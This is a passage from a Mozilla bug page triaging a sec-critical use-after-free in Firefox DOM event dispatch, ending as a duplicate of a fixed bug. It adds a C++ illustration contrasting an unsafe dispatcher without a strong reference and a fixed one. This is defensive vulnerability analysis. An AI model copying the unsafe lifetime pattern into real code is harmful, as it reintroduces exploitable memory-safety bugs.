Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3981==ABORTING
Updated•8 years ago
Group: core-security → dom-core-security
Keywords: csectype-uaf, sec-critical
Updated•8 years ago
status-firefox56: --- → affected
Version: 55 Branch → Trunk
Comment 3•8 years ago
This test case uses fuzzPriv.trustedKeyEvent, so maybe the rating is too high.
Masayuki, do you have time to look at this? Thanks.
Flags: needinfo?(masayuki)
Assignee
Comment 4•8 years ago
Looks like the WidgetEvent came from a dom::Event. So, perhaps, the dom::Event is destroyed by the GC or CC.
I'm not sure if this is so high because this tries to read a bool member which is wrapped by two inline methods.
Flags: needinfo?(masayuki)
Assignee
Comment 5•8 years ago
I think that this is the cause.
Looks like nobody guarantees the lifetime of the DOM event being dispatched from EventTarget::DispatchEvent().
https://searchfox.org/mozilla-central/source/__GENERATED__/dom/bindings/EventTargetBinding.cpp#955,960,963,974
(Although I'm not sure how to reproduce this, because when I built an ASAN build in my environment for a similar bug, I couldn't reproduce it.)
Comment 6•8 years ago
obj sure should be rooted there, and that is keeping the event alive.
Comment 7•8 years ago
Hmm, but does obj point to some wrapper around the actual event's JS wrapper, and then something cuts the edge between those wrappers?
Comment 8•8 years ago
If that is the case, then this isn't a DOM event issue at all, but bindings.
Comment 9•8 years ago
Comment on attachment 8883828 [details] [diff] [review]
Patch
The thing is that caller of DispatchEvent really should keep Event alive.
Why doesn't obj in bindings do it? Or is that a wrapper on top of the JS wrapper for the event, and we somehow cut the edge?
If that is the case, this is a generic problem and shouldn't be fixed in event handling code but in bindings or the JS engine.
bz is on vacation, but perhaps peterv has something to say here.
Flags: needinfo?(peterv)
Attachment #8883828 -
Flags: review?(bugs)
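Comment 5 and comment 9 both come down to one lifetime rule: whoever dispatches an Event must hold a strong reference to it until the post-dispatch reads (such as DefaultPrevented()) are done, because a listener can drop the last owner, here via the testcase's GC and CC calls. The C++ below is an added illustration of that rule and is not Gecko code and not the patch attached to this bug; Event, StrongRef, DispatchWithoutGrip, DispatchWithGrip and the g_liveEvents bookkeeping are all constructed for the example, with g_liveEvents standing in for ASan so the read of a freed object is reported instead of dereferenced.

```cpp
#include <cstddef>
#include <functional>
#include <iostream>
#include <set>
#include <vector>

// Added illustration, not Gecko code: a toy refcounted "Event" and dispatcher
// that reproduce the lifetime hazard from comments 5 and 9, and the usual fix
// (the dispatcher holds its own strong reference for the duration of dispatch).

struct Event;
// Stand-in for ASan's bookkeeping of live heap objects: lets the dispatcher
// detect a use-after-free instead of actually dereferencing freed memory.
static std::set<const Event*> g_liveEvents;

struct Event {
    int refCount = 0;
    bool defaultPrevented = false;
    Event() { g_liveEvents.insert(this); }
    ~Event() { g_liveEvents.erase(this); }
    void AddRef() { ++refCount; }
    void Release() { if (--refCount == 0) delete this; }
    void PreventDefault() { defaultPrevented = true; }
    bool DefaultPrevented() const { return defaultPrevented; }
};

// Minimal strong-reference smart pointer (hypothetical; plays the role of RefPtr).
template <class T>
class StrongRef {
    T* p_ = nullptr;
public:
    StrongRef() = default;
    StrongRef(T* p) : p_(p) { if (p_) p_->AddRef(); }
    StrongRef(const StrongRef& o) : StrongRef(o.p_) {}
    ~StrongRef() { if (p_) p_->Release(); }
    StrongRef& operator=(T* p) {
        if (p) p->AddRef();
        T* old = p_;
        p_ = p;
        if (old) old->Release();
        return *this;
    }
    StrongRef& operator=(const StrongRef& o) { return *this = o.p_; }
    T* get() const { return p_; }
    T* operator->() const { return p_; }
};

using Listener = std::function<void(Event*)>;

// The only strong owner of the event outside the dispatcher: it plays the part
// of the JS wrapper / cycle-collected graph that the testcase's GC+CC tear down.
static StrongRef<Event> g_owner;

enum DispatchResult { kNotPrevented = 0, kPrevented = 1, kUseAfterFree = -1 };

// Unsafe variant: takes a raw pointer and trusts the caller to keep it alive.
int DispatchWithoutGrip(Event* aEvent, const std::vector<Listener>& aListeners) {
    for (const Listener& l : aListeners) l(aEvent);
    // PostHandleEvent-style read after the listeners ran. If the last owner
    // released the event inside a listener, this is the read ASan flagged.
    if (!g_liveEvents.count(aEvent)) return kUseAfterFree;
    return aEvent->DefaultPrevented() ? kPrevented : kNotPrevented;
}

// Fixed variant: a local strong reference ("kung fu death grip") guarantees the
// event outlives every listener and the post-dispatch read.
int DispatchWithGrip(Event* aEvent, const std::vector<Listener>& aListeners) {
    StrongRef<Event> grip(aEvent);
    for (const Listener& l : aListeners) l(aEvent);
    if (!g_liveEvents.count(aEvent)) return kUseAfterFree;  // unreachable with the grip
    return aEvent->DefaultPrevented() ? kPrevented : kNotPrevented;
}

// Scenario mirroring the testcase: the listener calls preventDefault and then
// drops the only owning reference (what GC/CC does to an unrooted wrapper).
int RunScenario(bool aUseGrip) {
    g_owner = new Event;
    std::vector<Listener> listeners = {
        [](Event* e) { e->PreventDefault(); g_owner = nullptr; }
    };
    Event* raw = g_owner.get();
    return aUseGrip ? DispatchWithGrip(raw, listeners)
                    : DispatchWithoutGrip(raw, listeners);
}

std::size_t LiveEventCount() { return g_liveEvents.size(); }

int main() {
    std::cout << "without grip: " << RunScenario(false) << " (-1 = use-after-free detected)\n";
    std::cout << "with grip:    " << RunScenario(true) << " (1 = defaultPrevented read safely)\n";
    std::cout << "live events after both runs: " << LiveEventCount() << "\n";
    return 0;
}
```

The unsafe dispatcher returns kUseAfterFree only because the example checks g_liveEvents first; a real build would read freed memory there, which is exactly what the ASan report above shows in DefaultPrevented(). The fixed dispatcher differs by a single local StrongRef, and the grip also releases the event cleanly once dispatch returns, so no object leaks.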
Comment 10•8 years ago
This sounds a little like bug 1371259, which bz has patched, but hasn't landed yet.
Comment 11•8 years ago
Yeah, most likely fixed by the patches from bug 1371259, but it'd be good to verify that.
Flags: needinfo?(peterv)
Updated•8 years ago
status-firefox54: --- → wontfix
status-firefox55: --- → affected
status-firefox-esr52: --- → affected
Comment 12•8 years ago
Right, based on reading the testcase+stacks I'm pretty sure this is a duplicate of bug 1371259.
Depends on: CVE-2017-7801
Comment 13•8 years ago
Nils, this should be fixed across all supported branches with the latest ASAN CI builds. Can you please confirm?
Flags: needinfo?(nils)
Reporter
Comment 14•8 years ago
Ryan, just tried to reproduce on the latest build and it does not crash anymore.
Flags: needinfo?(nils)
Comment 15•8 years ago
Thanks for confirming.
Status: ASSIGNED → RESOLVED
Closed: 8 years ago
No longer depends on: CVE-2017-7801
Resolution: --- → DUPLICATE
Updated•8 years ago
Flags: sec-bounty?
Updated•8 years ago
Flags: sec-bounty? → sec-bounty-
Updated•5 years ago
Updated•4 years ago
Group: dom-core-security
Updated•8 months ago
Keywords: reporter-external